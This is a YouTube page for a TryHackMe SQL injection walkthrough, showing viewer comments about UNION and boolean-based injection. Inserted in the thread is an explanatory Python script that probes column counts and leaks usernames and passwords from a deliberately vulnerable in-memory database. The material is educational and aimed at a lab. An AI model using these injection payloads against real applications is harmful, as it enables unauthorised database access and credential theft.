SQL Injection Vulnerability Explained | TryHackMe Junior Penetration Tester | OSCP

32,226 views

Motasem Hamdan | Cyber Security & Tech

1 day ago

Comments
@gmoguel69 · 3 years ago
The best explanation for SQL Injection that I've ever heard. I never understood it until I watched this video, thank you.
@peepers46 · 3 years ago
This was one of the best explanations of SQL injection I've seen. Thank you.
@Jebly_5555 · 1 year ago
Very VERY helpful. I don't totally know all the SQL formatting and arguments and stuff yet, so it helps to have it explained. It was even better once you started explaining beyond the task because it helped reinforce the points the tasks made.
@NicolasCramer-z2t · 1 year ago
Once again Mr. Motasem helps me not lose more time banging my head against the wall. Thanks!
@iCyberVenom · 2 years ago
Great explanation. Best to increment by one for each letter/number when "guessing" database/table/username/password instead of randomly hopping between letters and numbers. Then again...a script could automate this entire process, so it's interesting this SQL injection task never mentions it. It leaves learners with the impression they'll have to memorize these manual tests.
@alexandrabeekers3747 · 2 years ago
Totally agree with previous comments. Thank you for this excellent explanation, couldn't have done it without it.
@aroxander · 1 year ago
Very nice video. I was very confused by the wording at level 4, so seeing how you were doing it made it click in my head.
@sharky9493 · 2 years ago
I struggled in task 8... thanks for the help!!
@TYLONsRoar · 8 months ago
Thank you Kind Sir. Now all I have to do is watch👏 cram👏 and repeat.👏
@fmoney · 2 years ago
At 18:53, did you copy the single apostrophe before the OR? It's not working for me, and I need to spend more time to understand how it worked, but I don't understand what I was doing wrong. On a better note, I figured out the password started with a three: as soon as you said numbers I tried 1, 2, then 3 and got a true response on the level three question.
@MotasemHamdan · 2 years ago
Yes I did. If it doesn't work with a single one, try it with a double.
@fmoney · 2 years ago
@MotasemHamdan I tried with double. I was copying with the single apostrophe every time, but it only worked once. I'm having fun though.
@hequinteros · 2 years ago
The best explanation I have seen for SQL Injection, especially about task #8 😊
@TheSpecialist54 · 2 years ago
I find your channel very informative, thanks bro.
@extremoleste8310 · 2 years ago
Friend, I really like your classes; please make more videos of hard-level machines.
@francesa5096 · 2 years ago
Thanks a lot for the detailed explanation. This is so beautiful.
@silentkille4 · 2 years ago
Great explanation, love your content.
@mongodb7832 · 2 years ago
Great video, will be watching more.
@tonyYoutube2 · 9 months ago
Thanks for your explanations.
@vimalan_sb · 2 years ago
At 23:25, can you please explain how the SQL query "SELECT * FROM users where username = 'user' UNION SELECT 1, 2, 3;" changed the value from {"taken" : false} to {"taken" : true} even though the username 'user' is not present in the database?
@missx0 · 2 years ago
I have the same doubt.
@vimalan_sb · 2 years ago
@missx0 The WHERE condition username = 'user' will never be true because there is no such username in the database. Assume that the users table has 5 columns; when we use ' UNION SELECT 1,2,3,4,5 ', a dummy row with 5 columns will be returned. Since a row with 5 columns (similar to that of the users table) is returned, the application logic assumes that the WHERE condition became true and a users table row was fetched.
@iSgapetti · 1 year ago
@vimalan_sb I think it's just like at 7:36, where the id must be changed from 1 (a valid one) to 0 (an invalid one). TryHackMe's explanation is: the article is being displayed because it takes the first returned result somewhere in the web site's code and shows that. To get around that, we need the first query to produce no results. This can simply be done by changing the article id from 1 to 0. So I'm guessing that the first part of the UNION statement will somehow be disregarded if it is invalid or produces no results.
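The two questions in the thread above (why `' UNION SELECT 1,2,3` flips `{"taken": false}` to `{"taken": true}` for a username that does not exist, and why the article id has to be changed from 1 to 0) are both about what a UNION does to the result set the application inspects. The following is an added example, not code from the video or from TryHackMe: a constructed in-memory SQLite database and two deliberately vulnerable query builders that stand in for the room's username-check and article endpoints. Table and column names (`users`, `articles`, `username`, `password`, `title`, `body`) and the sample rows are assumptions chosen to make the behaviour visible.

```python
import sqlite3
from typing import Optional


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the room's backend (assumed schema, not the real one)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'p4ssw0rd');
        INSERT INTO users VALUES (2, 'martin', 'secret');
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'First article');
    """)
    return con


def username_taken(con: sqlite3.Connection, username: str) -> dict:
    """Vulnerable username-availability check: user input is concatenated into the query.
    The JSON answer only says whether the result set was empty, which is exactly why a
    UNION row counts as 'taken' even though no such user exists."""
    sql = f"SELECT * FROM users WHERE username = '{username}'"
    return {"taken": bool(con.execute(sql).fetchall())}


def find_column_count(con: sqlite3.Connection, max_cols: int = 10) -> Optional[int]:
    """Probe UNION SELECT 1 / 1,2 / 1,2,3 ... until the database stops complaining.
    A UNION is only valid when both SELECTs return the same number of columns, so the
    first payload that yields {"taken": True} reveals how many columns 'users' has."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        # Trailing "-- " comments out the closing quote the application appends.
        payload = f"x' UNION SELECT {placeholders} -- "
        try:
            if username_taken(con, payload)["taken"]:
                return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch; a real app would error or answer {"taken": false}
    return None


def first_article_row(con: sqlite3.Connection, article_id: str) -> tuple:
    """Mimics the article page from the task: it renders only the FIRST row returned.
    With id=1 the genuine article is that first row and the injected UNION row is never
    shown; with id=0 the left-hand SELECT matches nothing, so the attacker-chosen row is
    the first (and only) row the page displays."""
    sql = f"SELECT * FROM articles WHERE id = {article_id}"
    return con.execute(sql).fetchone()


if __name__ == "__main__":
    db = build_db()
    print(username_taken(db, "user"))                                  # {'taken': False}
    print(username_taken(db, "user' UNION SELECT 1,2,3 -- "))         # {'taken': True}
    print("columns:", find_column_count(db))                           # 3
    leak = "UNION SELECT 1, username, password FROM users"
    print(first_article_row(db, f"1 {leak}"))  # the real article wins the first slot
    print(first_article_row(db, f"0 {leak}"))  # nothing on the left, so the leaked row shows
```

The `-- ` comment terminator is written with a trailing space on purpose: MySQL, which the room uses, only treats `--` as a comment when it is followed by whitespace, and the space is what keeps the application's own closing quote from breaking the query. SQLite is used here only because it runs offline; the column-count probing and the "first row wins" behaviour are the same idea as in the task.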
@arunakumbar-bs6ne · 1 year ago
Well explained thank you🥳
@unclehoop3554 · 2 years ago
So at 35:56, you just keep enumerating all the numbers and letters as long as it returns true? Is that how you get the number 38?
@unclehoop3554 · 2 years ago
I think I get the answer from you at 42:45. Thank you for making this video!
@sufij · 3 years ago
Hey brother! Can you please cover the CSS room? I've been stuck on the last challenge for a couple of days and cannot figure out what exactly I'm doing wrong. Apparently there is an automated component which appears to be complicating things a bit.
@GuyFawkes1 · 6 months ago
What is the purpose of UNION? From what I understood it is used to select data from multiple tables. I am banging my head against the wall understanding this part: union select 1, union select 1,2,3.
@chocolate9111 · 3 years ago
Need a Hip Flask walkthrough!
@WarThunderista · 8 months ago
Guys, I suggest you bang your head first and watch this video after you complete it on your own, to confirm your knowledge. This way you are going to understand everything much better.
@aht_root7133 · 2 years ago
Thanks broo
@davidb9323 · 3 years ago
Can you increase your audio volume?
@mridontclickbaitftw4366 · 2 years ago
I'm kind of confused how you got 3845 on the boolean-based injection...
@Blu3yyy · 1 year ago
Thank you!
@alveek · 9 months ago
Thanks, man.
@huuloc8719 · 3 years ago
Thank you so much bro
@firecasts · 1 year ago
Like Jesus Christ's age, 33rd comment to thank you a lot. I was trying the third part, monitoring everything; I tried to mix something, but the hints were not so nice.
@kezzle9609 · 2 years ago
This isn't much of an explanation, like why you changed the id to a zero.
@NoName1412 · 3 years ago
I want to ask: what if we don't know the length of the password or username? Thank you.
@MotasemHamdan · 3 years ago
You need to keep trying by incrementing the characters until you are able to guess the complete password. In an automated fashion, sqlmap would do this for you.
@z3t4r44 · 7 months ago
I was stuck on level 4 after finding 'analytics' as the table name...
@itay1207 · 1 year ago
Your audio is always low!
@cyberteccyber7691 · 2 years ago
Great, great, awesome. BR
@gihandilshara847 · 3 years ago
2nd view and like